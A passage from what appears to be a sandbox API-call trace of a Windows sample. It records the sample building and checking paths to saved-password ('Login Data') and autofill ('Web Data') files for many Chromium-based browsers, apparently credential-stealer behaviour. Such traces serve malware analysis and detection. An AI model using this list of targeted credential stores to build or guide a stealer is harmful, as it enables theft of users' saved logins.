hHeap=0x5b0000) returned 1 [0111.753] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.753] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Vivaldi\\User Data\\Default\\Web Data") returned 0 [0111.754] GetProcessHeap () returned 0x5b0000 [0111.754] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cbe90 | out: hHeap=0x5b0000) returned 1 [0111.754] GetProcessHeap () returned 0x5b0000 [0111.754] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f5e) returned 0x5c7f08 [0111.755] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0111.756] wvsprintfW (in: param_1=0x5c7f08, param_2="%s%s\\Login Data", arglist=0xdf774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalVivaldi\\Login Data") returned 53 [0111.756] GetProcessHeap () returned 0x5b0000 [0111.756] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x6e) returned 0x5cbe70 [0111.756] GetProcessHeap () returned 0x5b0000 [0111.756] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7f08 | out: hHeap=0x5b0000) returned 1 [0111.757] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.757] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalVivaldi\\Login Data") returned 0 [0111.757] GetProcessHeap () returned 0x5b0000 [0111.757] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cbe70 | out: hHeap=0x5b0000) returned 1 [0111.757] GetProcessHeap () returned 0x5b0000 [0111.757] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f6e) returned 0x5c7f08 [0111.758] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0111.758] wvsprintfW (in: param_1=0x5c7f08, param_2="%s%s\\Default\\Login Data", arglist=0xdf774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalVivaldi\\Default\\Login Data") returned 61 [0111.758] GetProcessHeap () returned 0x5b0000 [0111.758] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7e) returned 0x5cbe80 [0111.758] GetProcessHeap () returned 0x5b0000 [0111.759] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7f08 | out: hHeap=0x5b0000) returned 1 [0111.760] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.760] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalVivaldi\\Default\\Login Data") returned 0 [0111.760] GetProcessHeap () returned 0x5b0000 [0111.761] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cbe80 | out: hHeap=0x5b0000) returned 1 [0111.761] GetProcessHeap () returned 0x5b0000 [0111.761] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f84) returned 0x5c7f08 [0111.762] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0111.763] wvsprintfW (in: param_1=0x5c7f08, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0xdf778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Chromodo\\User Data\\Default\\Login Data") returned 80 [0111.763] GetProcessHeap () returned 0x5b0000 [0111.763] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xa4) returned 0x5cbe98 [0111.763] GetProcessHeap () returned 0x5b0000 [0111.763] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7f08 | out: hHeap=0x5b0000) returned 1 [0111.764] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.764] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Chromodo\\User Data\\Default\\Login Data") returned 0 [0111.765] GetProcessHeap () returned 0x5b0000 [0111.765] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cbe98 | out: hHeap=0x5b0000) returned 1 [0111.765] GetProcessHeap () returned 0x5b0000 [0111.765] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f80) returned 0x5c7f08 [0111.766] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0111.766] wvsprintfW (in: param_1=0x5c7f08, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0xdf774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Chromodo\\User Data\\Default\\Web Data") returned 78 [0111.766] GetProcessHeap () returned 0x5b0000 [0111.767] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xa0) returned 0x5bae18 [0111.767] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7f08 | out: hHeap=0x5b0000) returned 1 [0111.768] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.768] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Chromodo\\User Data\\Default\\Web Data") returned 0 [0111.768] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5bae18 | out: hHeap=0x5b0000) returned 1 [0111.769] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f5e) returned 0x5c7f08 [0111.769] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0111.770] wvsprintfW (in: param_1=0x5c7f08, param_2="%s%s\\Login Data", arglist=0xdf774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalComodo\\Chromodo\\Login Data") returned 61 [0111.770] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7e) returned 0x5cbe70 [0111.770] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7f08 | out: hHeap=0x5b0000) returned 1 [0111.777] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.777] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalComodo\\Chromodo\\Login Data") returned 0 [0111.778] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cbe70 | out: hHeap=0x5b0000) returned 1 [0111.778] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f6e) returned 0x5c7f08 [0111.834] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0111.835] wvsprintfW (in: param_1=0x5c7f08, param_2="%s%s\\Default\\Login Data", arglist=0xdf774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalComodo\\Chromodo\\Default\\Login Data") returned 69 [0111.835] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x8e) returned 0x5cbe80 [0111.835] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7f08 | out: hHeap=0x5b0000) returned 1 [0111.837] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.837] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalComodo\\Chromodo\\Default\\Login Data") returned 0 [0111.838] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cbe80 | out: hHeap=0x5b0000) returned 1 [0111.838] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f84) returned 0x5c7f08 [0111.838] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0111.839] wvsprintfW (in: param_1=0x5c7f08, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0xdf778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Superbird\\User Data\\Default\\Login Data") returned 74 [0111.839] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x98) returned 0x5cbe98 [0111.840] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7f08 | out: hHeap=0x5b0000) returned 1 [0111.840] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.840] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Superbird\\User Data\\Default\\Login Data") returned 0 [0111.841] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cbe98 | out: hHeap=0x5b0000) returned 1 [0111.841] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f80) returned 0x5c7f08 [0111.841] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0111.842] wvsprintfW (in: param_1=0x5c7f08, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0xdf774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Superbird\\User Data\\Default\\Web Data") returned 72 [0111.842] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x94) returned 0x5cbe90 [0111.843] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7f08 | out: hHeap=0x5b0000) returned 1 [0111.843] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.843] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Superbird\\User Data\\Default\\Web Data") returned 0 [0111.844] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cbe90 | out: hHeap=0x5b0000) returned 1 [0111.844] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f5e) returned 0x5c7f08 [0111.845] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0111.845] wvsprintfW (in: param_1=0x5c7f08, param_2="%s%s\\Login Data", arglist=0xdf774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalSuperbird\\Login Data") returned 55 [0111.845] GetProcessHeap () returned 0x5b0000 [0111.845] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x72) returned 0x5c7190 [0111.845] GetProcessHeap () returned 0x5b0000 [0111.846] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7f08 | out: hHeap=0x5b0000) returned 1 [0111.847] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.847] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalSuperbird\\Login Data") returned 0 [0111.847] GetProcessHeap () returned 0x5b0000 [0111.848] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7190 | out: hHeap=0x5b0000) returned 1 [0111.848] GetProcessHeap () returned 0x5b0000 [0111.848] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f6e) returned 0x5c7f08 [0111.848] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0111.849] wvsprintfW (in: param_1=0x5c7f08, param_2="%s%s\\Default\\Login Data", arglist=0xdf774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalSuperbird\\Default\\Login Data") returned 63 [0111.849] GetProcessHeap () returned 0x5b0000 [0111.849] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x82) returned 0x5cbe80 [0111.849] GetProcessHeap () returned 0x5b0000 [0111.849] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7f08 | out: hHeap=0x5b0000) returned 1 [0111.850] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.850] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalSuperbird\\Default\\Login Data") returned 0 [0111.850] GetProcessHeap () returned 0x5b0000 [0111.850] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cbe80 | out: hHeap=0x5b0000) returned 1 [0111.850] GetProcessHeap () returned 0x5b0000 [0111.850] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f84) returned 0x5c7f08 [0111.851] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0111.852] wvsprintfW (in: param_1=0x5c7f08, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0xdf778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Coowon\\Coowon\\User Data\\Default\\Login Data") returned 78 [0111.852] GetProcessHeap () returned 0x5b0000 [0111.852] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xa0) returned 0x5bae18 [0111.852] GetProcessHeap () returned 0x5b0000 [0111.852] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7f08 | out: hHeap=0x5b0000) returned 1 [0111.853] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.853] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Coowon\\Coowon\\User Data\\Default\\Login Data") returned 0 [0111.853] GetProcessHeap () returned 0x5b0000 [0111.853] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5bae18 | out: hHeap=0x5b0000) returned 1 [0111.853] GetProcessHeap () returned 0x5b0000 [0111.853] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f80) returned 0x5c7f08 [0111.854] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0111.854] wvsprintfW (in: param_1=0x5c7f08, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0xdf774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Coowon\\Coowon\\User Data\\Default\\Web Data") returned 76 [0111.854] GetProcessHeap () returned 0x5b0000 [0111.854] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x9c) returned 0x5bb400 [0111.854] GetProcessHeap () returned 0x5b0000 [0111.855] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7f08 | out: hHeap=0x5b0000) returned 1 [0111.855] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.855] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Coowon\\Coowon\\User Data\\Default\\Web Data") returned 0 [0111.856] GetProcessHeap () returned 0x5b0000 [0111.856] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5bb400 | out: hHeap=0x5b0000) returned 1 [0111.856] GetProcessHeap () returned 0x5b0000 [0111.856] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f5e) returned 0x5c7f08 [0111.856] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0111.857] wvsprintfW (in: param_1=0x5c7f08, param_2="%s%s\\Login Data", arglist=0xdf774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalCoowon\\Coowon\\Login Data") returned 59 [0111.857] GetProcessHeap () returned 0x5b0000 [0111.857] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7a) returned 0x5cbe70 [0111.857] GetProcessHeap () returned 0x5b0000 [0111.857] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7f08 | out: hHeap=0x5b0000) returned 1 [0111.858] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.858] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalCoowon\\Coowon\\Login Data") returned 0 [0111.858] GetProcessHeap () returned 0x5b0000 [0111.858] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cbe70 | out: hHeap=0x5b0000) returned 1 [0111.858] GetProcessHeap () returned 0x5b0000 [0111.859] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f6e) returned 0x5c7f08 [0111.859] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0111.860] wvsprintfW (in: param_1=0x5c7f08, param_2="%s%s\\Default\\Login Data", arglist=0xdf774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalCoowon\\Coowon\\Default\\Login Data") returned 67 [0111.860] GetProcessHeap () returned 0x5b0000 [0111.860] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x8a) returned 0x5cbe80 [0111.860] GetProcessHeap () returned 0x5b0000 [0111.860] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7f08 | out: hHeap=0x5b0000) returned 1 [0111.861] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.861] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalCoowon\\Coowon\\Default\\Login Data") returned 0 [0111.861] GetProcessHeap () returned 0x5b0000 [0111.861] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cbe80 | out: hHeap=0x5b0000) returned 1 [0111.861] GetProcessHeap () returned 0x5b0000 [0111.861] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f84) returned 0x5c7f08 [0111.862] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0111.863] wvsprintfW (in: param_1=0x5c7f08, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0xdf778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Mustang Browser\\User Data\\Default\\Login Data") returned 80 [0111.863] GetProcessHeap () returned 0x5b0000 [0111.863] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xa4) returned 0x5cbe98 [0111.863] GetProcessHeap () returned 0x5b0000 [0111.863] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7f08 | out: hHeap=0x5b0000) returned 1 [0111.864] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.864] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Mustang Browser\\User Data\\Default\\Login Data") returned 0 [0111.864] GetProcessHeap () returned 0x5b0000 [0111.864] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cbe98 | out: hHeap=0x5b0000) returned 1 [0111.864] GetProcessHeap () returned 0x5b0000 [0111.864] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f80) returned 0x5c7f08 [0111.865] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0111.866] wvsprintfW (in: param_1=0x5c7f08, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0xdf774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Mustang Browser\\User Data\\Default\\Web Data") returned 78 [0111.866] GetProcessHeap () returned 0x5b0000 [0111.866] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xa0) returned 0x5baa28 [0111.866] GetProcessHeap () returned 0x5b0000 [0111.866] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7f08 | out: hHeap=0x5b0000) returned 1 [0111.867] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.867] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Mustang Browser\\User Data\\Default\\Web Data") returned 0 [0111.867] GetProcessHeap () returned 0x5b0000 [0111.867] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5baa28 | out: hHeap=0x5b0000) returned 1 [0111.867] GetProcessHeap () returned 0x5b0000 [0111.867] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f5e) returned 0x5c7f08 [0111.868] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0111.868] wvsprintfW (in: param_1=0x5c7f08, param_2="%s%s\\Login Data", arglist=0xdf774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalMustang Browser\\Login Data") returned 61 [0111.868] GetProcessHeap () returned 0x5b0000 [0111.868] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7e) returned 0x5cbe70 [0111.868] GetProcessHeap () returned 0x5b0000 [0111.869] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7f08 | out: hHeap=0x5b0000) returned 1 [0111.870] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.870] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalMustang Browser\\Login Data") returned 0 [0111.870] GetProcessHeap () returned 0x5b0000 [0111.870] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cbe70 | out: hHeap=0x5b0000) returned 1 [0111.871] GetProcessHeap () returned 0x5b0000 [0111.871] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f6e) returned 0x5c7f08 [0111.871] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0111.872] wvsprintfW (in: param_1=0x5c7f08, param_2="%s%s\\Default\\Login Data", arglist=0xdf774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalMustang Browser\\Default\\Login Data") returned 69 [0111.872] GetProcessHeap () returned 0x5b0000 [0111.872] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x8e) returned 0x5cbe80 [0111.872] GetProcessHeap () returned 0x5b0000 [0111.873] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7f08 | out: hHeap=0x5b0000) returned 1 [0111.873] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.874] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalMustang Browser\\Default\\Login Data") returned 0 [0111.874] GetProcessHeap () returned 0x5b0000 [0111.874] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cbe80 | out: hHeap=0x5b0000) returned 1 [0111.874] GetProcessHeap () returned 0x5b0000 [0111.874] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f84) returned 0x5c7f08 [0111.875] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0111.876] wvsprintfW (in: param_1=0x5c7f08, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0xdf778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\360Browser\\Browser\\User Data\\Default\\Login Data") returned 83 [0111.876] GetProcessHeap () returned 0x5b0000 [0111.876] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xaa) returned 0x5cbe98 [0111.876] GetProcessHeap () returned 0x5b0000 [0111.876] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7f08 | out: hHeap=0x5b0000) returned 1 [0111.877] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.877] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\360Browser\\Browser\\User Data\\Default\\Login Data") returned 0 [0111.878] GetProcessHeap () returned 0x5b0000 [0111.878] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cbe98 | out: hHeap=0x5b0000) returned 1 [0111.880] GetProcessHeap () returned 0x5b0000 [0111.880] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f80) returned 0x5c7f08 [0111.880] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0111.881] wvsprintfW (in: param_1=0x5c7f08, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0xdf774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\360Browser\\Browser\\User Data\\Default\\Web Data") returned 81 [0111.881] GetProcessHeap () returned 0x5b0000 [0111.881] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xa6) returned 0x5cbe90 [0111.881] GetProcessHeap () returned 0x5b0000 [0111.881] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7f08 | out: hHeap=0x5b0000) returned 1 [0111.882] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.882] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\360Browser\\Browser\\User Data\\Default\\Web Data") returned 0 [0111.882] GetProcessHeap () returned 0x5b0000 [0111.883] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cbe90 | out: hHeap=0x5b0000) returned 1 [0111.883] GetProcessHeap () returned 0x5b0000 [0111.883] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f5e) returned 0x5c7f08 [0111.883] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0111.884] wvsprintfW (in: param_1=0x5c7f08, param_2="%s%s\\Login Data", arglist=0xdf774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local360Browser\\Browser\\Login Data") returned 64 [0111.884] GetProcessHeap () returned 0x5b0000 [0111.884] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x84) returned 0x5cbe70 [0111.884] GetProcessHeap () returned 0x5b0000 [0111.884] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7f08 | out: hHeap=0x5b0000) returned 1 [0111.885] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.885] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local360Browser\\Browser\\Login Data") returned 0 [0111.885] GetProcessHeap () returned 0x5b0000 [0111.885] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cbe70 | out: hHeap=0x5b0000) returned 1 [0111.885] GetProcessHeap () returned 0x5b0000 [0111.885] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f6e) returned 0x5c7f08 [0111.886] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0111.887] wvsprintfW (in: param_1=0x5c7f08, param_2="%s%s\\Default\\Login Data", arglist=0xdf774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local360Browser\\Browser\\Default\\Login Data") returned 72 [0111.887] GetProcessHeap () returned 0x5b0000 [0111.887] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x94) returned 0x5cbe80 [0111.887] GetProcessHeap () returned 0x5b0000 [0111.887] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7f08 | out: hHeap=0x5b0000) returned 1 [0111.887] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.888] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local360Browser\\Browser\\Default\\Login Data") returned 0 [0111.888] GetProcessHeap () returned 0x5b0000 [0111.888] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cbe80 | out: hHeap=0x5b0000) returned 1 [0111.888] GetProcessHeap () returned 0x5b0000 [0111.888] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f84) returned 0x5c7f08 [0111.889] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0111.889] wvsprintfW (in: param_1=0x5c7f08, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0xdf778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CatalinaGroup\\Citrio\\User Data\\Default\\Login Data") returned 85 [0111.889] GetProcessHeap () returned 0x5b0000 [0111.889] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xae) returned 0x5cbe98 [0111.889] GetProcessHeap () returned 0x5b0000 [0111.890] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7f08 | out: hHeap=0x5b0000) returned 1 [0111.890] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.890] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CatalinaGroup\\Citrio\\User Data\\Default\\Login Data") returned 0 [0111.890] GetProcessHeap () returned 0x5b0000 [0111.891] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cbe98 | out: hHeap=0x5b0000) returned 1 [0111.891] GetProcessHeap () returned 0x5b0000 [0111.891] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f80) returned 0x5c7f08 [0111.891] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0111.892] wvsprintfW (in: param_1=0x5c7f08, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0xdf774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CatalinaGroup\\Citrio\\User Data\\Default\\Web Data") returned 83 [0111.892] GetProcessHeap () returned 0x5b0000 [0111.892] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xaa) returned 0x5cbe90 [0111.892] GetProcessHeap () returned 0x5b0000 [0111.892] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7f08 | out: hHeap=0x5b0000) returned 1 [0111.893] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.893] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CatalinaGroup\\Citrio\\User Data\\Default\\Web Data") returned 0 [0111.893] GetProcessHeap () returned 0x5b0000 [0111.894] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cbe90 | out: hHeap=0x5b0000) returned 1 [0111.894] GetProcessHeap () returned 0x5b0000 [0111.894] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f5e) returned 0x5c7f08 [0111.895] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0111.895] wvsprintfW (in: param_1=0x5c7f08, 